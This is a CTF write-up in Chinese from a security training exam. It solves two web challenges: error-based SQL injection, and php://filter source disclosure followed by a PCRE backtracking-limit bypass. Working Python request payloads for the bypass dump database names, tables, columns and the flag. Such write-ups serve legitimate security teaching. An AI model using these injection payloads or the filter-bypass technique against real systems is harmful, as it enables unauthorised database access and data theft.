安恒暑期培训期末考核wp

WRONG_SQL

进入后，随便注册登录了一个账号，点击show看到

又看到了id=1疑似注入点，开始测试。
输入单引号回显报错
输入union,sleep,空格（可用内敛注释/**/绕过）等，均被过滤
由于单引号得报错会直接展示出来，所以可以通过报错注入得到flag。
爆库
前半段库名 后半段库名
爆z3333333的表名
爆3333333z的字段名
爆数据以后发现半了flag 然后发现了后半个
得到flag{87f495c71c00b93b777061fe1ff704f2}

EZSQL

考点：php://filter伪协议，正则回溯
首先在list里看到url?flie=list联想到伪协议
http://das.wetolink.com:44006/file.php?file=php://filter/read=convert.base64-encode/resource=list得到一串base64的编码
解码以后得到源码

  <!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="./bootstrap-4.0.0/favicon.ico">

    <title>ezsql</title>

    <!-- Bootstrap core CSS -->
    <link href="./bootstrap-4.0.0/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="starter-template.css" rel="stylesheet">
  </head>

  <body>

    <nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
      <a class="navbar-brand" href="#">ezsql</a>
      <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExampleDefault" aria-controls="navbarsExampleDefault" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>

      <div class="collapse navbar-collapse" id="navbarsExampleDefault">
        <ul class="navbar-nav mr-auto">
          <li class="nav-item">
            <a class="nav-link" href="./index.php">Home</a>
          </li>
          <li class="nav-item active">
            <a class="nav-link" href="./file.php?file=list">List<span class="sr-only">(current)</span></a>
          </li>
            <div class="dropdown-menu" aria-labelledby="dropdown01">
              <a class="dropdown-item" href="#">Action</a>
              <a class="dropdown-item" href="#">Another action</a>
              <a class="dropdown-item" href="#">Something else here</a>
            </div>
        </ul>
      </div>
    </nav>

    <main role="main" class="container">

      <div class="starter-template">
        <h1>ezsql</h1>

        <p class="lead">        
        <?php include("sql.php")?>
        </p>
      </div>

    </main><!-- /.container -->

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script>window.jQuery || document.write('<script src="./bootstrap-4.0.0/assets/js/vendor/jquery-slim.min.js"><\/script>')</script>
    <script src="./bootstrap-4.0.0/assets/js/vendor/popper.min.js"></script>
    <script src="./bootstrap-4.0.0/dist/js/bootstrap.min.js"></script>
  </body>
</html>

发现其中有<?php include("sql.php")?>再次构造伪协议又得到base64的编码sql

<?php
error_reporting(0);

include("config.php");


$id=isset($_POST['id']) ? $_POST['id'] : 1;
if(preg_match('/UNION.+?SELECT|\/\*.*\*\/|sleep|and|if|&&|\|\||\^|%|ascii|mid|left|greatest|least|substr|=|-|<|>|benchmark|like|in|between|regexp/is', $id)) {
    die('SQL Injection');
}

mysqli_query($conn,"set names utf8");

$sql="select * from `ctf` where id ='".$id."'";

$result=mysqli_query($conn,$sql);

$row=mysqli_fetch_row($result);
if($id==1)
{
	echo "<img src='./img/1.png'><br>";
}
else if($id==2)
{
	echo"<img src='./img/2.jpg'><br>";
}
else if($id==3)
{
	echo"<img src='./img/3.jpg'><br>";
}
else
{
	echo "what do you do?";
}
echo "  <p class=\"lead\">   
		{$row[1]}     
        </p>
        <p class=\"lead\">   
		{$row[2]}     
        </p>
     "
?>

发现中间有一段正则过滤，如果绕过则可以执行SQL注入动作。
这里是PHP利用PCRE回溯次数限制绕过安全限制
我们可以通过在其中插入超过其限制的垃圾字符来绕过。

import requests

url='http://das.wetolink.com:44006/sql.php'

response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,version(),3#"})

print(response.text)

得到反馈

所以可以用类似的方法进行其他操作
爆库response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,version(),3#"})
得到information_schema,ctf,mysql,test

爆表名
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctf'#"})
得到cat,flag

爆字段名
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctf' and table_name='flag'#"})
得到id,flag

查看字段内容
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(flag),3 from ctf.flag#"})
得到flag